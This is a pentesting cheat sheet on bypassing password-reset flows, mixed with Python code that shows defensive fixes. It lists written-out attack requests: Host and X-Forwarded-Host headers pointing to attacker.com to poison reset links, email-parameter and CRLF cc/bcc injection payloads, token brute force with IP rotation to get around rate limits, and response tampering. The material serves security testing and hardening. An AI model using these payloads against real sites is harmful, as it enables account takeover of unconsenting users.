Pentest Book by n3t_hunt3r
Last updated 3 years ago


Reset/Forgotten Password Bypass

The following compilation of techniques was taken from

Password Reset Token Leak Via Referrer

The HTTP Referer header is an optional request header that identifies the address of the web page from which the requested resource was linked: it contains the address of the previous page from which a link to the currently requested page was followed. When the password reset page itself links to or loads third-party resources, the reset URL, token included, is sent to those third parties in this header.

Exploitation

  • Request a password reset for your own email address

  • Click the password reset link

  • Don't change the password

  • Click any third-party link on the page (e.g. Facebook, Twitter)

  • Intercept the request in the Burp Suite proxy

  • Check whether the Referer header is leaking the password reset token.

Impact

It allows whoever controls that third-party site to change the user's password (CSRF attack), because they now know the user's password reset token.

Reference:

Account Takeover Through Password Reset Poisoning

If you find a host header attack and it’s out of scope, try to find the password reset button!

Exploitation

  • Intercept the password reset request in Burp Suite

  • Add the following header, or edit the existing Host header, in Burp Suite (try the variants one at a time):

Host: attacker.com

Host: target.com
X-Forwarded-Host: attacker.com

Host: target.com
Host: attacker.com

  • Check whether the link to change the password inside the email points to attacker.com

Patch

Use $_SERVER['SERVER_NAME'] rather than $_SERVER['HTTP_HOST']

$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
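The same patch in Python, as an added example that is not from the page: the vulnerable variant mirrors the HTTP_HOST line above, while the hardened variant ignores client-supplied host headers and builds the link from a configured base URL. CANONICAL_BASE and ALLOWED_HOSTS are assumed server-side configuration values, not something the page defines.

```python
# Added example: build the password-reset link so that a client-supplied
# Host / X-Forwarded-Host header cannot redirect it to attacker.com.
from urllib.parse import quote

CANONICAL_BASE = "https://target.com"            # assumed configuration
ALLOWED_HOSTS = {"target.com", "www.target.com"}  # assumed configuration


def vulnerable_reset_link(headers, token):
    """Mirrors the HTTP_HOST pattern: the link host is whatever the client sent."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset-password.php?token={quote(token)}"


def hardened_reset_link(headers, token):
    """Use the configured base URL for the link; never the request's host headers.

    The Host header is still checked against an allowlist so that a poisoned
    request is rejected (and can be logged) instead of silently served.
    """
    host = headers.get("Host", "").split(":")[0].lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"{CANONICAL_BASE}/reset-password.php?token={quote(token)}"


# Constructed sample requests: a legitimate one and the two poisoning variants above.
LEGIT = {"Host": "target.com"}
POISONED_HOST = {"Host": "attacker.com"}
POISONED_XFH = {"Host": "target.com", "X-Forwarded-Host": "attacker.com"}
```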

Impact

The victim will receive the malicious link in their email, and, when clicked, will leak the user’s password reset link / token to the attacker, leading to full account takeover.

Reference:

Account Takeover: Password Reset With Manipulating Email Parameter

Exploitation

  • Add attacker email as second parameter using &

POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
  • Add attacker email as second parameter using %20

POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
  • Add attacker email as second parameter using |

POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
  • Add attacker email as second parameter using cc

POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
  • Add attacker email as second parameter using bcc

POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
  • Add attacker email as second parameter using ,

POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
  • Add attacker email as second parameter in json array

POST /resetPassword
[...]
{"email":["victim@mail.tld","attacker@mail.tld"]}
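An added server-side check, not part of the original page, that rejects every variant listed above by requiring exactly one well-formed address in the request; the address regex and the assumption that JSON bodies carry a single "email" string are mine.

```python
# Added example: strict parsing of the reset request's email parameter, so that
# duplicate parameters, delimiters, CR/LF header injection and JSON arrays are
# all refused instead of mailing the reset link to a second address.
import json
import re
from urllib.parse import parse_qs

# Deliberately conservative: one local part, one domain, no whitespace, commas,
# quotes or CR/LF. (Assumption: the app does not need RFC 5322 edge cases.)
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def extract_reset_email(body, content_type="application/x-www-form-urlencoded"):
    """Return the single recipient address, or raise ValueError."""
    if content_type == "application/json":
        data = json.loads(body)
        value = data.get("email") if isinstance(data, dict) else None
    else:
        # strict_parsing turns malformed pairs into errors instead of ignoring them
        params = parse_qs(body, keep_blank_values=True, strict_parsing=True)
        values = params.get("email", [])
        if len(values) != 1:                 # rejects email=a&email=b
            raise ValueError("email must be supplied exactly once")
        value = values[0]
    if not isinstance(value, str):           # rejects {"email": [...]}
        raise ValueError("email must be a single string")
    if not EMAIL_RE.fullmatch(value):        # rejects %20, |, ',', %0a%0dcc:, quotes
        raise ValueError(f"invalid email address: {value!r}")
    return value.lower()


# Constructed request bodies mirroring the variants above
PAYLOADS = [
    "email=victim@email.com&email=attacker@email.com",
    "email=victim@email.com%20email=attacker@email.com",
    "email=victim@email.com|email=attacker@email.com",
    'email="victim@mail.tld%0a%0dcc:attacker@mail.tld"',
    'email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"',
    'email="victim@mail.tld",email="attacker@mail.tld"',
]
```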

Reference

Full Account Takeover via Changing Email And Password of any User through API Parameters

Exploitation

  • Log in with the attacker's own account and go to the change-password function

  • Start Burp Suite and intercept the request

  • Send the intercepted request to Repeater and modify the email and password parameters

POST /api/changepass
[...]
{"form": {"email":"victim@email.tld","password":"12345678"}}

Reference

No Rate Limiting: Email Bombing

Exploitation

  • Start Burp Suite and intercept the password reset request

  • Send it to Intruder

  • Use a null payload so the same request is sent repeatedly

Reference

Find out How Password Reset Token is Generated

Figure out the pattern of the password reset token. Check whether it is:

  • Generated based on a timestamp

  • Generated based on the user ID

  • Generated based on the user's email

  • Generated based on first name and last name

  • Generated based on date of birth

  • Generated using cryptography

Use Burp Sequencer to find the randomness or predictability of tokens.

Response manipulation: Replace Bad Response With Good One

Look for a request and response like these:

HTTP/1.1 401 Unauthorized
{"message":"unsuccessful","statusCode":403,"errorDescription":"Unsuccessful"}

Change the response to:

HTTP/1.1 200 OK
{"message":"success","statusCode":200,"errorDescription":"Success"}

Reference

Using Expired Token

  • Check if the expired token can be reused

Brute Force Password Reset Token

Try to brute-force the reset token using Burp Suite

POST /resetPassword
[...]
email=victim@email.com&code=$BRUTE$
  • Use IP Rotator in Burp Suite to bypass IP-based rate limiting.

Reference

Try Using Your Token

  • Try using your own password reset token with the victim's account

POST /resetPassword
[...]
email=victim@email.com&code=$YOUR_TOKEN$

Reference

Session Invalidation in Logout/Password Reset

When a user logs out or resets their password, the current session should be invalidated. Therefore, grab the cookies while the user is logged in, log out, and check whether the cookies are still valid. Repeat the process, changing the password instead of logging out.

Reset Token expiration Time

Reset tokens must have an expiration time; after it has passed, the token should no longer be accepted to change the user's password.
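Added example, not from the page, covering the token checks in the sections above (how the token is generated, reuse of an expired token, brute force, using your own token against the victim's account, session invalidation, and expiry): a minimal reset-token store with random tokens hashed at rest, a 15-minute TTL (assumed policy), single use, binding to the requesting account, and a per-user session version that logs out existing sessions on reset. The in-memory dicts stand in for a database.

```python
# Added example: reset-token lifecycle that closes the weaknesses probed above.
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumed policy: a reset link is valid for 15 minutes

_tokens = {}            # sha256(token) -> {"user": account, "expires": unix time}
_session_version = {}   # account -> counter bumped on every password change
_sessions = {}          # session id -> (account, session version at login)


def _h(token):
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(user, now=None):
    """Return a fresh 256-bit random token (not derived from time, id or email).
    Only its hash is stored, so a database leak does not hand out usable tokens."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _tokens[_h(token)] = {"user": user, "expires": now + TOKEN_TTL_SECONDS}
    return token


def login(user):
    sid = secrets.token_urlsafe(16)
    _sessions[sid] = (user, _session_version.get(user, 0))
    return sid


def session_is_valid(sid):
    """A session stays valid only while its version matches the account's current one."""
    user, version = _sessions.get(sid, (None, -1))
    return user is not None and version == _session_version.get(user, 0)


def reset_password(user, token, now=None):
    """Consume the token for this account only. Unknown, foreign, expired or
    already-used tokens all fail; 256 random bits make guessing impractical."""
    now = time.time() if now is None else now
    digest = _h(token)
    record = _tokens.get(digest)
    if record is None or record["user"] != user or now > record["expires"]:
        return False
    del _tokens[digest]                                           # single use
    _session_version[user] = _session_version.get(user, 0) + 1   # log out existing sessions
    return True
```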

Extra Checks

  • Long password (>200 characters) leads to DoS

  • Append a second email parameter and value

  • Use and analyze the callback

  • Use carbon copy: email=%0a%0dcc:

References

https://hackerone.com/reports/342693
https://hackerone.com/reports/272379
https://hackerone.com/reports/737042
https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
https://hackerone.com/reports/226659
https://hackerone.com/reports/167631
https://www.acunetix.com/blog/articles/password-reset-poisoning/
https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
https://twitter.com/HusseiN98D/status/1254888748216655872
https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240
https://hackerone.com/reports/280534
https://hackerone.com/reports/794395
https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
https://anugrahsr.github.io/posts/10-Password-reset-flaws/